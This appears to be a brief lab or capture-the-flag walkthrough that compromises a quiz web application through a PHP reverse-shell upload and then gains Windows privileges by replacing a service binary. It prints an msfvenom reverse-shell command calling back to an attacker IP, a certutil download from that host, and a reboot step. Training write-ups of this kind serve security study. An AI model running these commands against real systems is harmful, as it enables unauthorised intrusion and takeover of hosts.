45332

We have a quiz app here.

Now we can execute the uploaded file here We have code execution.

We can try php-reverse-shell.php Then running it we get a shell:

We can try this

searchsploit -x windows/local/48789.txt

Verifying this:

Now we can replace the binary with a reverse shell. We need a x64 reverse shell

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.245 LPORT=445 -f exe -o bd.exe

Now we can replace the bd.exe binary:

move bd.exe bd.service.exe

Then start a python server on kali

certutil -urlcache -f http://192.168.45.245/bd.exe bd.exe

Now transfer and reboot:

shutdown /r

Now we get a shell:

We got it